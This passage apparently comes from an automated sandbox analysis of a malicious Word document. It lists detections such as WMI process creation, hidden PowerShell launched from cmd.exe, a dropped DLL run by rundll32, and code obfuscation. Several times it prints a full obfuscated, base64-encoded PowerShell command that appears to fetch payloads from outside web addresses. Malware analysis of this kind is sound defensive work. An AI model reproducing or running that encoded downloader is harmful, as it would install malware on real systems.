wAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc, 7_2_10001B50
PE file contains sections with non-standard names
Source: I11F.dll.5.dr Static PE information: section name: .2
Source: I11F.dll.5.dr Static PE information: section name: .rdata2
Source: I11F.dll.5.dr Static PE information: section name: .text5
Source: I11F.dll.5.dr Static PE information: section name: .text4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0093A012 push ebp; retf 7_2_0093A015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00938596 push ebx; retf 7_2_009385AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0093B1CC push ebx; retf 7_2_0093B1CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 push ecx; ret 7_2_10001BFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F810 pushfd ; retf 7_2_1000F84E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C856 push ebp; retf 7_2_1000C85E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001C70 push edx; ret 7_2_10001CC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D8F3 pushad ; iretd 7_2_1000D8F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BD9B push esp; retf 7_2_1001BDB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B265 push 588A19FDh; iretd 7_2_1000B278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001FA73 push edx; iretd 7_2_1001FA9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EEBF push eax; iretd 7_2_1000EEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EEFA push 00000000h; iretd 7_2_1000EF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10022EFF push eax; iretd 7_2_10022F64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B304 push 588A1BCDh; iretd 7_2_1000B314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F307 push esp; retf 7_2_1000F308
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BF15 push 0000002Dh; iretd 7_2_1000BF1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB23 push eax; iretd 7_2_1001CB34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001FB27 push eax; iretd 7_2_1001FB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CFC7 pushad ; iretd 7_2_1000CFC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10022FEB push edx; ret 7_2_10023001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F7FB pushfd ; retf 7_2_1000F84E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029BFB0 push edx; ret 7_2_0029C269
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00267172 push dword ptr [ebp+ecx*8-49h]; retf 7_2_00267176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002862CD pushad ; iretd 7_2_002862E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027F6CD push esi; ret 7_2_0027F6D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026899D push 00000369h; ret 7_2_00268A28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002689CD push 00000369h; ret 7_2_00268A28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0028FB74 push esi; ret 7_2_0028FB8B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00261D11 push FFFFFFD5h; ret 7_2_00261D18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00260E8F push esi; ret 7_2_00260E94

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError, 7_2_10001CE0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
